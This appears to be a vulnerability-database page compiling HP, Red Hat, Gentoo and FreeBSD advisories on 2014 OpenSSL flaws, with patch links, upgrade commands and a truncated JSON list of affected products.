1 http://www.hp.com/swpublishing/MTX-bd2042a1c7574aad90c4839efe smhamd64-cp023964.exe \express\hpfeatures\hpagents-ws\components\Win2008
2 http://www.hp.com/swpublishing/MTX-062078f1ae354b7e99c86c151c smhx86-cp023963.exe \express\hpfeatures\hpagents-ws\components\Win2008
3 http://www.hp.com/swpublishing/MTX-7b23e47d5d9b420b94bd1323eb vcax86 cp025295.exe \express\hpfeatures\hpagents-ws\components\Win2008
4 http://www.hp.com/swpublishing/MTX-2557aa7dc1654cf6b547c1a9e4 vcaamd64-cp025296.exe \express\hpfeatures\hpagents-ws\components\Win2008
5 http://www.hp.com/swpublishing/MTX-5827037475e44abab586463723 Do not rename the downloaded component for this step. \express\hpfeatures\hpagents-sles11-x64\components
\express\hpfeatures\hpagents-sles10-x64\components
\express\hpfeatures\hpagents-rhel5-x64\components
\express\hpfeatures\hpagents-rhel6-x64\components
6 http://www.hp.com/swpublishing/MTX-57ab6bb78b6e47a18718f44133 Do not rename the downloaded component for this step. \express\hpfeatures\hpagents-sles11-x64\components
\express\hpfeatures\hpagents-sles10-x64\components
\express\hpfeatures\hpagents-rhel5-x64\components
\express\hpfeatures\hpagents-rhel6-x64\components
7 http://www.hp.com/swpublishing/MTX-34bcab41ac7e4db299e3f5f2f1 smhx86-cp025274.exe \express\hpfeatures\hpagents-ws\components\Win2003
8 http://www.hp.com/swpublishing/MTX-00eb9ac82e86449e8c3ba101bd smhamd64-cp025275.exe \express\hpfeatures\hpagents-ws\components\Win2003
Download and extract the HP SUM component from ftp://ftp.hp.com/pub/softlib2/software1/pubsw-windows/p991570621/v99346
Copy all content from extracted folder and paste at \eXpress\hpfeatures\fw-proLiant\components Initiate Install HP Management Agents for SLES 11 x64 on the target running SLES11 x64. Initiate Install HP Management Agents for SLES 10 x64 on the target running SLES10 x64. Initiate Install HP Management Agents for RHEL 6 x64 on the target running RHEL 6 x64. Initiate Install HP Management Agents for RHEL 5 x64 on the target running RHEL 5 x64. Initiate Install HP Management Agents for Windows x86/x64 job on the target running Windows.
HISTORY Version:1 (rev.1) - 1 April 2015 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: rhevm-spice-client security and bug fix update Advisory ID: RHSA-2015:0197-01 Product: Red Hat Enterprise Virtualization Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0197.html Issue date: 2014-07-25 Updated on: 2015-02-11 CVE Names: CVE-2014-3509 CVE-2014-3511 =====================================================================
- Summary:
Updated rhevm-spice-client packages that fix two security issues and several bugs are now available for Red Hat Enterprise Virtualization Manager 3.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
RHEV-M 3.5 - noarch
- Description:
Red Hat Enterprise Virtualization Manager provides access to virtual machines using SPICE. These SPICE client packages provide the SPICE client and usbclerk service for both Windows 32-bit operating systems and Windows 64-bit operating systems. (CVE-2014-3509)
A flaw was found in the way OpenSSL handled fragmented handshake packets. (CVE-2014-3511)
This update also fixes the following bugs:
-
Previously, various clipboard managers, operating on the client or on the guest, would occasionally lose synchronization, which resulted in clipboard data loss and the SPICE console freezing. Now, spice-gtk have been patched, such that clipboard synchronization does not freeze the SPICE console anymore. (BZ#1083489)
-
Prior to this update, when a SPICE console was launched from the Red Hat Enterprise Virtualization User Portal with the 'Native Client' invocation method and 'Open in Full Screen' selected, the displays of the guest virtual machine were not always configured to match the client displays. After this update, the SPICE console will show a full-screen guest display for each client monitor. (BZ#1076243)
-
A difference in behavior between Linux and Windows clients caused an extra nul character to be sent when pasting text in a guest machine from a Windows client. This invisible character was visible in some Java applications. With this update, the extra nul character is removed from text strings and no more extraneous character would appear. (BZ#1090122)
-
Previously, If the clipboard is of type image/bmp, and the data is of 0 size, GTK+ will crash. With this update, the data size is checked first, and GTK+ no longer crashes when clipboard is of type image/bmp, and the data is of 0 size. (BZ#1090433)
-
Modifier-only key combinations cannot be registered by users as hotkeys so if a user tries to set a modifier-only key sequence (for example, 'ctrl+alt') as the hotkey for releasing the cursor, it will fail, and the user will be able to release the cursor from the window. With this update, when a modifier-only hotkey is attempted to be registered, it will fall back to the default cursor-release sequence (which happens to be 'ctrl+alt'). (BZ#985319)
-
Display configuration sometimes used outdated information about the position of the remote-viewer windows in order to align and configure the guest displays. Occasionally, this caused the guest displays to became unexpectedly swapped when a window is resized. With this update, remote-viewer will always use the current window locations to align displays, rather than using a possibly outdated cached location information. (BZ#1018182)
All rhevm-spice-client users are advised to upgrade to these updated packages, which contain backported patches to correct these issues.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1018145 - --full-screen=auto-conf sometimes (but frequently) doesn't work correctly 1018182 - primary monitor is switched if some screen gets bigger then current primary screen 1076243 - [BUG] RHEV SPICE console not opening in full screen or detecting resolution by default 1083489 - [SPICE][BUG] Spice session freezes randomly 1090122 - Pasting into java apps inserts unprintable character 1090433 - [GTK][BUG] win32: add more clipboard data checks to avoid crash 1103366 - Rebase virt-viewer to 0.6.0 1105650 - Fix windows productversion to fit -z releases 1115445 - in About dialog, hyphen version-build dividing hyphen is missing 1127498 - CVE-2014-3509 openssl: race condition in ssl_parse_serverhello_tlsext 1127504 - CVE-2014-3511 openssl: TLS protocol downgrade attack
- Package List:
RHEV-M 3.5:
Source: rhevm-spice-client-3.5-2.el6.src.rpm
noarch: rhevm-spice-client-x64-cab-3.5-2.el6.noarch.rpm rhevm-spice-client-x64-msi-3.5-2.el6.noarch.rpm rhevm-spice-client-x86-cab-3.5-2.el6.noarch.rpm rhevm-spice-client-x86-msi-3.5-2.el6.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2014-3509 https://access.redhat.com/security/cve/CVE-2014-3511 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFU253LXlSAg2UNWIIRAjJEAKCrqGkFJHhLN3Iqt069y96etuCAxgCcCTWW 1SViofNGiqbiufMWwY7okg4= =cjiU -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201412-39
http://security.gentoo.org/
Severity: Normal Title: OpenSSL: Multiple vulnerabilities Date: December 26, 2014 Bugs: #494816, #519264, #525468 ID: 201412-39
Synopsis
Multiple vulnerabilities have been found in OpenSSL, the worst of which could result in Denial of Service or Man-in-the-Middle attacks.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/openssl < 1.0.1j *>= 0.9.8z_p2 >= 1.0.1j
Description
Multiple vulnerabilities have been discovered in OpenSSL. Please review the CVE identifiers referenced below for details.
Resolution
All OpenSSL 1.0.1 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.1j"
All OpenSSL 0.9.8 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-0.9.8z_p2"
Packages which depend on this library may need to be recompiled. Tools such as revdep-rebuild may assist in identifying these packages.
References
[ 1 ] CVE-2013-6449 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6449 [ 2 ] CVE-2013-6450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6450 [ 3 ] CVE-2014-3505 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3505 [ 4 ] CVE-2014-3506 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3506 [ 5 ] CVE-2014-3507 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3507 [ 6 ] CVE-2014-3509 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3509 [ 7 ] CVE-2014-3510 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3510 [ 8 ] CVE-2014-3511 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3511 [ 9 ] CVE-2014-3512 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3512 [ 10 ] CVE-2014-3513 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3513 [ 11 ] CVE-2014-3567 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3567 [ 12 ] CVE-2014-3568 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3568 [ 13 ] CVE-2014-5139 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-5139
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201412-39.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 .
References:
CVE-2014-3508 CVE-2014-3509 CVE-2014-3511 CVE-2014-3513 CVE-2014-3566 CVE-2014-3567 CVE-2014-3568 CVE-2014-5139 SSRT101894 SSRT101916 SSRT101918 SSRT101920 SSRT101921 SSRT101922 SSRT101923 SSRT101925 SSRT101926 SSRT101927
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. The HP Matrix Operating Environment v7.2.3 Update kit applicable to HP Matrix Operating Environment 7.2.x installations is available at the following location:
https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber =HPID
NOTE: Please read the readme.txt file before proceeding with the installation. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
============================================================================= FreeBSD-SA-14:18.openssl Security Advisory The FreeBSD Project
Topic: OpenSSL multiple vulnerabilities
Category: contrib Module: openssl Announced: 2014-09-09 Affects: All supported versions of FreeBSD. Corrected: 2014-08-07 21:04:42 UTC (stable/10, 10.0-STABLE) 2014-09-09 10:09:46 UTC (releng/10.0, 10.0-RELEASE-p8) 2014-08-07 21:06:34 UTC (stable/9, 9.3-STABLE) 2014-09-09 10:13:46 UTC (releng/9.3, 9.3-RELEASE-p1) 2014-09-09 10:13:46 UTC (releng/9.2, 9.2-RELEASE-p11) 2014-09-09 10:13:46 UTC (releng/9.1, 9.1-RELEASE-p18) 2014-08-07 21:06:34 UTC (stable/8, 8.4-STABLE) 2014-09-09 10:13:46 UTC (releng/8.4, 8.4-RELEASE-p15) CVE Name: CVE-2014-3506, CVE-2014-3507, CVE-2014-3508, CVE-2014-3510, CVE-2014-3509, CVE-2014-3511, CVE-2014-3512, CVE-2014-5139
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit
FreeBSD includes software from the OpenSSL Project. The OpenSSL Project is a collaborative effort to develop a robust, commercial-grade, full-featured Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library.
II. [CVE-2014-5139]
III. Impact
A remote attacker may be able to cause a denial of service (application crash, large memory consumption), obtain additional information, cause protocol downgrade. Additionally, a remote attacker may be able to run arbitrary code on a vulnerable system if the application has been set up for SRP.
IV. Workaround
No workaround is available.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.
2) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.
[FreeBSD 10.0]
fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-10.0.patch
fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-10.0.patch.asc
gpg --verify openssl-10.0.patch.asc
[FreeBSD 9.3]
fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.3.patch
fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.3.patch.asc
gpg --verify openssl-9.3.patch.asc
[FreeBSD 9.2, 9.1, 8.4]
fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.patch
fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.patch.asc
gpg --verify openssl-9.patch.asc
b) Apply the patch. Execute the following commands as root:
cd /usr/src
patch < /path/to/patch
c) Recompile the operating system using buildworld and installworld as
described in
Restart all deamons using the library, or reboot the system.
3) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:
freebsd-update fetch
freebsd-update install
VI. Correction details
The following list contains the correction revision numbers for each affected branch.
Branch/path Revision
stable/8/ r269687 releng/8.4/ r271305 stable/9/ r269687 releng/9.1/ r271305 releng/9.2/ r271305 releng/9.3/ r271305 stable/10/ r269686 releng/10.0/ r271304
To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed:
svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
VII.
References:
CVE-2014-0224 Remote Unauthorized Access, Disclosure of Information CVE-2014-3509 Remote Denial of Service (DoS) CVE-2014-3511 Remote Unauthorized Access, Disclosure of Information CVE-2014-5139 Remote Denial of Service (DoS) SSRT101818
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Note: For versions not listed, please contact support:
Note: ServiceCenter 6.2 is impacted only if using the Directory Services integration feature with the SC LDAP over SSL (LDAPS) protocol. If this feature is in use, HP recommends that ServiceCenter 6.2 customers upgrade to Service Manager 7.11, 9.21, or 9.34, and then apply the patches listed below.
Patch Version Package Name / SSO URL
SM711P22 AIX Server 7.11.720 p22 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/LID/HPSM_00614
HP Itanium Server 7.11.720 p22 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/LID/HPSM_00615
HP parisc Server 7.11.720 p22 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/LID/HPSM_00616
Linux x86 Server 7.11.720 p22 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/LID/HPSM_00617
Solaris Server 7.11.720 p22 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/LID/HPSM_00618
Windows Server 7.11.720 p22 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/LID/HPSM_00619
SM921P9 AIX server 9.21.706 P9 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/LID/HPSM_00621
HPUX/IA server 9.21.706 P9 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/LID/HPSM_00622
HPUX/PA server 9.21.706 P9 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/LID/HPSM_00623
Linux server 9.21.706 P9 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/LID/HPSM_00624
Solaris server 9.21.706 P9 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/LID/HPSM_00625
Windows server 9.21.706 P9 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/LID/HPSM_00626
SM934P2 AIX Server 9.34.2003 p2 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/LID/HPSM_00605
HP Itanium Server 9.34.2003 p2 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/LID/HPSM_00606
Linux Server 9.34.2003 p2 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/LID/HPSM_00607
Solaris Server 9.34.2003 p2 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/LID/HPSM_00608
Windows Server 9.34.2003 p2 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/LID/HPSM_00609
HISTORY Version:1 (rev.1) - 22 January 2015 Initial release Version:2 (rev.2) - 23 January 2015 added note for versions not listed in table
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201408-0081", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1f" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.1.1" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "8.4-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.3" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "10.0-beta", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "upward integration modules scvmm add-in", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.3" }, { "model": "-release-p2", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "virtual connect 8gb 24-port fc module", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "3.0" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "alpha", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0" }, { "model": "tivoli netcool system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "9.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "8.4-release-p15", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.8" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "sterling connect:direct for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.4" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "insight control", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.016" }, { "model": "tealeaf cx", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "8.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "9.2-release-p11", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.470" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.0" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "virtual connect 8gb 24-port fc module", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3" }, { "model": "tivoli netcool/reporter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5" }, { "model": "vios fp-25 sp-02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.4" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5.1" }, { "model": "9.1-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.3-release-p16", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "insight control server provisioning", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.0" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.2" }, { "model": "netscaler t1", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "7.3-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.4-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6.2" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "tealeaf cx", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "7.1-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "service manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.34" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "tealeaf cx", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "idatplex dx360 m4 type", "scope": 